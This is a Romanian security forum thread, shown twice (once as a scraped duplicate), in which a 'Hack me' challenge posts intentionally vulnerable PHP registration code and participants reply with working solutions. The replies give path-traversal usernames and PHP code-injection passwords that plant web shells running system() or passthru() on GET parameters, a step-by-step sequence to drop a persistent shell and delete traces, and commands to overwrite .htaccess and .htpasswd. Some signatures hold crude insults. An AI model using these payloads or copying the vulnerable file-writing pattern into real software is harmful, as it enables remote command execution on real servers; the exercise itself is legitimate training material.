[PHP] [Moderate] - Hack me - Romanian Security Team

SirGod · 02-03-2010, 09:57 PM

Fisiere pe server: index.php.
Foldere pe server: /users.
.htaccess din /users

Codul din index.php

Code:

<?php

error_reporting(0);

if(isset($_POST['submit'])) 

   {

	$name=$_POST['name'];
	$record = 'users/'.$name.'_data.php';
	$fh = fopen($record, 'w') or die("Can not open file!");
	$tag='<?php "';
	fwrite($fh, $tag);
	$reguser = 'Username = ' .$_POST['name'];
	fwrite($fh, $reguser);
	$reguser2 = 'Password = ' .$_POST['password'];
	fwrite($fh, $reguser2);
	$tag2='" ?>';
	fwrite($fh, $tag2);
	fclose($fh);
	echo 'Registered'; 

	}

else 

	{	

	echo '<html>'.
	'<form method="POST" action=""> '.
	'<input type="text" name="name">'.
	'<input type="password" name="password">'.
	'<input type="submit" name="submit" value="submit">'.
	'</form>'.
	'</html>';

	}

?>

In folderul users avem htaccess (deny from all) deci nu il putem accesa sa ii vedem continutul si nici fisierele nu putem sa le accesam.

Ce trebuie sa faceti:

In directorul root, in acelasi loc cu index.php, plasati cumva un fisier cu numele vostru care sa va poata permite executarea de comenzi preluate dintr-o variabila preluata prin $_GET.

paxnWo · 02-04-2010, 08:51 AM

le: nu am citit toata cerinta ta, eu am scris daca aveam deja fisierul respectiv in root folder.

le 2 : cred ca asta-i rezolvarea:

username: ../pax
password: echo system($_GET['sef']);

----------------------------------------

cd /users; ls; cat sirgod_data.php

sau daca avem htpasswd

cd /users; echo "pax:$apr1$du8Pz...$RJyRugqxByqFpW7Rk2RQS/" > .htpasswd

sau daca nu avem

cd /users; rm .htaccess; touch .htaccess; echo "order deny, allow
deny from all
allow from 89.177.11.*" > .htaccess

loki · 02-04-2010, 10:57 AM

cam ciudata scrierea fisierului: <?php "Username = userPassword = password" ?>

user:
password: "; passthru($_GET['cmd']); echo "
asa am rezolvat cu ghilimelele.

SirGod · 02-07-2010, 12:58 PM

@loki: Gresit. Iti va creea fisierul in folderul users, pe care nu il poti accesa pentru ca ai .htaccess, deci nu ai ce face cu el.

@pax: Ai prins ideea, dar vezi ca ce injectezi tu nu merge. O sa iti dea o eroare cand accesezi fisierul:

Code:

Parse error: parse error, expecting `T_STRING' or `T_VARIABLE' or `T_NUM_STRING' in C:\wamp\www\wargames\pax_data.php on line 1

Trebuie sa fi atent ce cod injectezi. Modul in care salvez datele de inregistrare l-am facut ca sa fie putin mai dificil. Si nu poti accesa /users/ , ai acces web nu consola, nu inteleg ce vrei sa arati cu alea.

Sa explic pe scurt:

Nu aveti acces la site decat prin WWW. Nu aveti consola. Nu puteti face NIMIC ca sa accesati folderul users pentru ca nu puteti trece peste htaccess. Si inca ceva, de care nu ati tinut cont. Am zis sa creati un fisier cu numele vostru nu numelevostru_data.php . Nu e mare branza, doar o mica schimbare de cod care trebuie injectat.

Fitty · 02-07-2010, 08:51 PM

Windows httpd server..
1. Creem un shell langa directorul users, numit shell_data.php
Username>> ../shell
Password>> "; ?><?php system($_GET['cmd']); //

2. shell_data.php?cmd=echo "<?php system($_GET['cmd']); ?>" > fitty.php

3. fitty.php?cmd=del shell_data.php

4. fitty.php?cmd=dir

>> Avem shell-ul fitty.php <<
Pa.

SirGod · 02-07-2010, 08:55 PM

Eh, merge si asa, dar merge si decat cu injectare o singura data, ceva de genu:

User: ../

Pass:

Code:

"?><?php
$code = "evil.php";
$handler = fopen($code, 'w') or die("cant open file");
$evil = "<?php system(\$_GET['cmd']); ?>";
fwrite($handler, $evil);
fclose($handler);
?>

Apoi accesam _data.php si ni se creeaza fisierul.

Fitty · 02-07-2010, 08:59 PM

gg pentru challenge

02-03-2010, 09:57 PM	#1 (permalink)
SirGod Registered Users Bautor de whiskey Join Date: Nov 2007 Location: Rm.Valcea Posts: 307 Rep Power: 3	[PHP] [Moderate] - Hack me hotel regim hotelier hotel yahoo domain Fisiere pe server: index.php. Foldere pe server: /users. .htaccess din /users Codul din index.php Code: <?php error_reporting(0); if(isset($_POST['submit'])) { $name=$_POST['name']; $record = 'users/'.$name.'_data.php'; $fh = fopen($record, 'w') or die("Can not open file!"); $tag='<?php "'; fwrite($fh, $tag); $reguser = 'Username = ' .$_POST['name']; fwrite($fh, $reguser); $reguser2 = 'Password = ' .$_POST['password']; fwrite($fh, $reguser2); $tag2='" ?>'; fwrite($fh, $tag2); fclose($fh); echo 'Registered'; } else { echo '<html>'. '<form method="POST" action=""> '. '<input type="text" name="name">'. '<input type="password" name="password">'. '<input type="submit" name="submit" value="submit">'. '</form>'. '</html>'; } ?> In folderul users avem htaccess (deny from all) deci nu il putem accesa sa ii vedem continutul si nici fisierele nu putem sa le accesam. Ce trebuie sa faceti: In directorul root, in acelasi loc cu index.php, plasati cumva un fisier cu numele vostru care sa va poata permite executarea de comenzi preluate dintr-o variabila preluata prin $_GET. __________________

02-04-2010, 08:51 AM	#2 (permalink)
paxnWo Registered Users Cultul betivilor Join Date: Mar 2008 Location: k̶̨͆̎̓̑͌̓̌̌̓ͤ͑̐͐ͫ Posts: 1,572 Rep Power: 3	le: nu am citit toata cerinta ta, eu am scris daca aveam deja fisierul respectiv in root folder. le 2 : cred ca asta-i rezolvarea: username: ../pax password: echo system($_GET['sef']); ---------------------------------------- cd /users; ls; cat sirgod_data.php sau daca avem htpasswd cd /users; echo "pax:$apr1$du8Pz...$RJyRugqxByqFpW7Rk2RQS/" > .htpasswd sau daca nu avem cd /users; rm .htaccess; touch .htaccess; echo "order deny, allow deny from all allow from 89.177.11." > .htaccess __________________ Tineti minte trei cuvinte: Garda merge inainte* ! ---------------------------- kw3 - waszilica: sugi pula Pax Nwo: fute-te singur Pax Nwo: haide kwe Pax Nwo: sus pe bar Pax Nwo: sus pe bar Pax Nwo: sus pe bar

02-04-2010, 10:57 AM	#3 (permalink)
loki Moderator Cultul betivilor Join Date: Feb 2008 Posts: 2,393 Rep Power: 5	cam ciudata scrierea fisierului: <?php "Username = userPassword = password" ?> user: password: "; passthru($_GET['cmd']); echo " asa am rezolvat cu ghilimelele. __________________

02-07-2010, 12:58 PM	#4 (permalink)
SirGod Registered Users Bautor de whiskey Join Date: Nov 2007 Location: Rm.Valcea Posts: 307 Rep Power: 3	@loki: Gresit. Iti va creea fisierul in folderul users, pe care nu il poti accesa pentru ca ai .htaccess, deci nu ai ce face cu el. @pax: Ai prins ideea, dar vezi ca ce injectezi tu nu merge. O sa iti dea o eroare cand accesezi fisierul: Code: Parse error: parse error, expecting `T_STRING' or `T_VARIABLE' or `T_NUM_STRING' in C:\wamp\www\wargames\pax_data.php on line 1 Trebuie sa fi atent ce cod injectezi. Modul in care salvez datele de inregistrare l-am facut ca sa fie putin mai dificil. Si nu poti accesa /users/ , ai acces web nu consola, nu inteleg ce vrei sa arati cu alea. Sa explic pe scurt: Nu aveti acces la site decat prin WWW. Nu aveti consola. Nu puteti face NIMIC ca sa accesati folderul users pentru ca nu puteti trece peste htaccess. Si inca ceva, de care nu ati tinut cont. Am zis sa creati un fisier cu numele vostru nu numelevostru_data.php . Nu e mare branza, doar o mica schimbare de cod care trebuie injectat. __________________

02-07-2010, 08:51 PM	#5 (permalink)
Fitty Bad coder Cultul betivilor Join Date: Mar 2009 Location: Pitesti Posts: 1,046 Rep Power: 3	Windows httpd server.. 1. Creem un shell langa directorul users, numit shell_data.php Username>> ../shell Password>> "; ?><?php system($_GET['cmd']); // 2. shell_data.php?cmd=echo "<?php system($_GET['cmd']); ?>" > fitty.php 3. fitty.php?cmd=del shell_data.php 4. fitty.php?cmd=dir >> Avem shell-ul fitty.php << Pa. __________________

Last edited by Fitty; 02-07-2010 at 08:54 PM.

02-07-2010, 08:55 PM	#6 (permalink)
SirGod Registered Users Bautor de whiskey Join Date: Nov 2007 Location: Rm.Valcea Posts: 307 Rep Power: 3	Eh, merge si asa, dar merge si decat cu injectare o singura data, ceva de genu: User: ../ Pass: Code: "?><?php $code = "evil.php"; $handler = fopen($code, 'w') or die("cant open file"); $evil = "<?php system(\$_GET['cmd']); ?>"; fwrite($handler, $evil); fclose($handler); ?> Apoi accesam _data.php si ni se creeaza fisierul. __________________

02-07-2010, 08:59 PM	#7 (permalink)
Fitty Bad coder Cultul betivilor Join Date: Mar 2009 Location: Pitesti Posts: 1,046 Rep Power: 3	gg pentru challenge __________________